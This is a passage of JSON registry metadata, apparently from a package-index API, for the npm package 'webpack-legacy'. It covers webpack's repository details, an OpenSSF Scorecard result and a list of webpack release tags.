funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1258409,"name":"webpack-legacy","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jade, coffee, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2017-05-02T07:10:45.880Z","latest_release_published_at":"2017-05-02T07:10:45.880Z","latest_release_number":"1.15.0","last_synced_at":"2026-09-03T00:16:49.537Z","created_at":"2022-04-08T15:09:45.884Z","updated_at":"2026-09-03T00:16:49.537Z","registry_url":"https://www.npmjs.com/package/webpack-legacy","install_command":"npm install webpack-legacy","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.15.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","ki